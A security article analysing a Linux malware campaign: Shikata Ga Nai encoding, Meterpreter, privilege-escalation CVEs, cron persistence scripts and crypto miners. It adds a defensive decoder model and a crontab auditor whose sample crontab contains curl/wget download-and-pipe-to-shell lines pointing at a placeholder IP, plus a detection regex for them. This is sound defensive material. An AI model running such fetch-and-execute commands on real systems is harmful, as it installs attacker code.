Stealthy Linux Malware Targets Endpoints & IoT Devices
This article examines a newly discovered Linux malware that specifically targets endpoints and Internet of Things (IoT) devices. The malware utilizes a small ELF file, occupying minimal space of approximately 300 bytes. It employs the Shikata Ga Nai encoder to encode the shellcode and requires the activation of modules for execution. Through decoding loops, dynamic instruction substitution, block ordering, and register selection, the malware decrypts the shellcode, subsequently executing it. The malware employs the Metasploit Meterpreter payload, enabling remote control of the compromised host and facilitating code execution. Additionally, it downloads and executes the Mettle program, which retrieves a smaller ELF file and exploits vulnerabilities (CVE-2021-4034, CVE-2021-3493). Furthermore, the malware employs various scripts to ensure persistence, including the installation of crontab commands, execution of a crypto miner, and retrieval of a crypto miner. To mitigate the risks associated with this malware, it is advisable to regularly update software with the latest security patches, install anti-virus and Endpoint Detection and Response (EDR) software on endpoints, implement a backup system for server files, and adopt a robust security strategy.
Key Takeaways
- The malware uses a small ELF file to spread and infect endpoints and IoT devices.
- It employs a decoding process with dynamic substitution of instructions and block ordering to execute the shellcode after decryption.
- The malware utilizes the Metasploit Meterpreter payload, allowing remote control of the infected host and code execution by the attacker.
- Persistence is achieved through the use of various scripts that add crontab commands to execute crypto miners.
Infection Chain
The infection chain of the new stealthy Linux malware involves the spread of a small ELF file that contains encoded shellcode and requires the activation of modules for execution. The malware employs various techniques in its decoding process, including dynamic substitution of instructions, dynamic block ordering, and dynamic selection of registers. These techniques make it challenging to detect and analyze the malware’s behavior. To prevent infection in endpoints and IoT devices, it is crucial to implement countermeasures such as updating software with the latest security patches, installing anti-virus and EDR software, using backup systems for server files, and implementing a robust security strategy. These measures can help mitigate the risk of malware infiltration and protect the integrity of the affected systems.
Decoding Process
During the decoding process, the malware utilizes dynamic substitution of instructions, dynamic block ordering, and dynamic selection of registers to decrypt and execute the shellcode. This technique allows the malware to evade detection and analysis by constantly changing its execution flow and behavior. The dynamic substitution of instructions involves replacing certain instructions with equivalent ones at runtime, making it difficult for security tools to identify and analyze the malware’s functionality. Dynamic block ordering refers to the rearrangement of code blocks within the malware’s execution flow, further obfuscating its behavior and making it harder to understand its purpose. By employing these dynamic techniques, the malware aims to bypass security defenses and successfully execute its payload without being detected.
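The paragraph above describes the decoding loop in terms of how it varies (instruction substitution, block order, register choice) but not what the loop computes. The block below is an added example, not code from the original article or from the malware itself: it models the additive-feedback XOR pass that the Shikata Ga Nai encoder is known for, in which each 4-byte block is XORed with a running key and the decoded block is then added to the key. The encoder function exists only to construct the sample input; the decoder is what an analyst would emulate after reading the initial key out of the stub. The payload bytes, the key values and the zero padding are all constructed assumptions, and the model ignores the real encoder's randomized stub entirely.

```python
import struct

MASK = 0xFFFFFFFF  # 32-bit key register, as in the x86 stub


def _pad4(data: bytes) -> bytes:
    """Zero-pad to a multiple of 4 bytes (constructed convention for this model)."""
    rem = len(data) % 4
    return data + b"\x00" * (4 - rem) if rem else data


def xor_additive_feedback_encode(payload: bytes, key: int) -> bytes:
    """Model of the additive-feedback XOR pass. Used here only to build
    sample input for the decoder below; it is not the Metasploit encoder."""
    payload = _pad4(payload)
    out = bytearray()
    for i in range(0, len(payload), 4):
        orig = struct.unpack("<I", payload[i:i + 4])[0]
        out += struct.pack("<I", orig ^ key)
        key = (key + orig) & MASK  # feedback: plaintext block folded into key
    return bytes(out)


def xor_additive_feedback_decode(encoded: bytes, key: int) -> bytes:
    """What the decoding loop computes, independent of how its instructions,
    block order or registers were shuffled: xor with key, then key += decoded."""
    if len(encoded) % 4:
        raise ValueError("encoded blob must be a multiple of 4 bytes")
    out = bytearray()
    for i in range(0, len(encoded), 4):
        enc = struct.unpack("<I", encoded[i:i + 4])[0]
        orig = enc ^ key
        out += struct.pack("<I", orig)
        key = (key + orig) & MASK
    return bytes(out)


def encoded_forms_are_distinct(payload: bytes, keys: list[int]) -> bool:
    """True when every initial key yields a different encoded blob for the same
    plaintext: the reason a byte signature on the encoded form does not hold up."""
    forms = {xor_additive_feedback_encode(payload, k) for k in keys}
    return len(forms) == len(keys)


def signature_hits(payload: bytes, keys: list[int], signature: bytes) -> int:
    """How many encoded variants still contain a plaintext signature."""
    return sum(signature in xor_additive_feedback_encode(payload, k) for k in keys)


if __name__ == "__main__":
    sample = b"CONSTRUCTED SAMPLE, NOT SHELLCODE"   # constructed, inert bytes
    blob = xor_additive_feedback_encode(sample, 0xDEADBEEF)
    print(xor_additive_feedback_decode(blob, 0xDEADBEEF))
    print(signature_hits(sample, [0xDEADBEEF, 0x12345678, 0x0BADF00D], b"SAMPLE"))
```

The practical point for detection is the last two functions: the plaintext is only recoverable after emulating the loop with the stub's initial key, so signatures should target behaviour after decoding (the Meterpreter stage, the downloads, the cron changes) rather than bytes of the encoded blob.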
Metasploit Meterpreter Payload
Utilizing the Metasploit Meterpreter payload, an attacker can remotely control a host and execute code, enabling them to exploit vulnerabilities and fetch smaller ELF files for malicious purposes. The remote control capabilities of the Metasploit Meterpreter payload allow the attacker to gain unauthorized access to the infected system, giving them full control over the compromised endpoint or IoT device. This payload plays a crucial role in the malware infection chain, as it facilitates the execution of the malicious code and the exploitation of vulnerabilities such as CVE-2021-4034 and CVE-2021-3493. These vulnerabilities serve as entry points for the attacker, allowing them to bypass security measures and gain privileged access to the target system. By leveraging these vulnerabilities, the attacker can further propagate the malware and carry out their malicious activities.
Frequently Asked Questions
How can the malware be spread to endpoints and IoT devices?
Common entry points for malware on endpoints and IoT devices include downloading malicious files, visiting compromised websites, opening infected email attachments, and connecting to infected external devices. Preventing the spread of malware involves updating software, using antivirus and EDR software, implementing robust security measures, and practicing safe browsing habits.
What techniques does the malware use for encoding and decoding its shellcode?
The shellcode is encoded with the Shikata Ga Nai encoder, and the decoding loop that recovers it uses dynamic substitution of instructions, dynamic block ordering, and dynamic selection of registers. These techniques obfuscate the shellcode in the Linux malware, making it difficult to detect and analyze.
What vulnerabilities does the Metasploit Meterpreter Payload exploit?
The Metasploit Meterpreter payload is used to gain control of a host and exploit vulnerabilities; the two named in this report are CVE-2021-4034 and CVE-2021-3493. It allows remote code execution and enables the attacker to fetch and execute smaller ELF files.
What scripts are used by the malware for persistence?
Scripts are used by the malware for persistence to ensure that the malicious code remains on the infected system even after a reboot. The scripts named in this report are unix.sh, brict.sh, politrict.sh, truct.sh, and restrict.sh. These scripts enable the malware to perform various actions, such as installing crontab commands and downloading crypto miners, thereby maintaining persistence on the compromised device.
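Since the persistence described in this answer and in the key takeaways comes down to crontab entries that fetch and run scripts, a defender's first check is to audit what cron is actually scheduling. The following is an added example, not code from the article or from the malware: it parses crontab text and flags entries that download and pipe to a shell, run something from a world-writable directory, or reference the script names listed above. The crontab content is constructed, the 198.51.100.10 address is a documentation-range placeholder, and the choice of world-writable directories is an assumption of this example.

```python
import re

# Script names taken from the report; everything else here is constructed.
KNOWN_SCRIPTS = ["unix.sh", "brict.sh", "politrict.sh", "truct.sh", "restrict.sh"]

# curl/wget whose output or result is handed to an interpreter ("| sh", "&& sh").
DOWNLOAD_EXEC = re.compile(
    r"\b(?:curl|wget)\b[^|&]*(?:\|\s*|&&\s*)(?:sh|bash|python\d*|perl)\b"
)
# Execution out of directories any local user can write to (assumed list).
WORLD_WRITABLE = re.compile(r"/(?:tmp|var/tmp|dev/shm)/\S+")

# Constructed sample crontab, not a real capture.
CRONTAB_SAMPLE = """\
# constructed sample crontab
SHELL=/bin/sh
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://198.51.100.10/unix.sh | sh
@reboot wget -q -O /tmp/.x http://198.51.100.10/brict.sh && sh /tmp/.x
30 1 * * * /opt/backup/run.sh
* * * * * /tmp/.restrict.sh
"""


def parse_crontab(text: str) -> list[tuple[str, str]]:
    """Split crontab text into (schedule, command) pairs.
    Skips comments, blank lines and VAR=value environment lines; handles both
    five-field schedules and @reboot-style keywords."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split()[0]
        if "=" in first and not first.startswith("@"):
            continue  # environment assignment, not a job
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed: schedule without a command
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append((schedule, command.strip()))
    return entries


def audit_crontab(text: str) -> list[dict]:
    """Return the entries worth a look, each with the reasons it was flagged."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if DOWNLOAD_EXEC.search(command):
            reasons.append("download-and-execute")
        if WORLD_WRITABLE.search(command):
            reasons.append("runs from world-writable dir")
        hits = [name for name in KNOWN_SCRIPTS if name in command]
        if hits:
            reasons.append("known script name: " + ", ".join(hits))
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(CRONTAB_SAMPLE):
        print(f"{finding['schedule']:<12} {finding['command']}")
        print("    " + "; ".join(finding["reasons"]))
```

On a live host the same function can be fed the output of `crontab -l` for each user plus the files under /etc/cron.d and /var/spool/cron; a hit on any of the three reasons is a reason to look at the command's download source and the file it writes, and a clean audit still says nothing about persistence placed elsewhere.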
What recommendations are provided to protect against this malware?
To protect against malware targeting endpoints and IoT devices, it is recommended to update software with the latest security patches, install anti-virus and EDR software, use backup systems for server files, and implement a robust security strategy focusing on Endpoint Protection and IoT Security.